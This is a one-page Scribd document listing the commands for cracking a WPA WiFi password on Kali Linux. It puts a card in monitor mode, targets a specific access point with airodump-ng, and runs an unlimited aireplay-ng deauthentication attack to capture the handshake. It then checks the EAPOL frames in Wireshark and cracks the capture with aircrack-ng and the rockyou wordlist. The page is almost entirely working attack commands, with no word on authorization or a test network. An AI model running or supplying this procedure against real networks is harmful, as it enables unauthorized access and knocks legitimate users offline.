0% found this document useful (0 votes)
183 views1 page

Commands To Crack Wifi Password

This document provides instructions for capturing WiFi traffic using airodump-ng and cracking passwords using aircrack-ng on the Kali Linux operating system. It describes how to check interfaces, start monitor mode to capture packets from a specific access point, run a deauthentication attack to capture handshakes, open the capture file in Wireshark and filter for EAPOL messages, then stop monitor mode and crack passwords using a dictionary attack with airocrack-ng.

Uploaded by

NISTRO SOLSAN
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
183 views1 page

Commands To Crack Wifi Password

This document provides instructions for capturing WiFi traffic using airodump-ng and cracking passwords using aircrack-ng on the Kali Linux operating system. It describes how to check interfaces, start monitor mode to capture packets from a specific access point, run a deauthentication attack to capture handshakes, open the capture file in Wireshark and filter for EAPOL messages, then stop monitor mode and crack passwords using a dictionary attack with airocrack-ng.

Uploaded by

NISTRO SOLSAN
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

!

See version of Kali


cat /etc/os-release
uname -a

! See interfaces
ip addr
iwconfig

!kill processes
sudo airmon-ng check kill

!Start monitor mode


sudo airmon-ng start wlan0

!Verify that monitor mode is used


sudo airmon-ng

!You could also use iwconfig to check that interface is in monitor mode:
iwconfig

! Get the AP's MAC address and channel


sudo airodump-ng wlan0mon

! AP-MAC & channel - you need to select your own here:


ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2

!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon

!2nd Window - deauth attack


!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon

!Use Wireshark to open hack file


wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol

!Stop monitor mode


airmon-ng stop wlan0mon

!Crack file with Rock you or another wordlist


!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

You might also like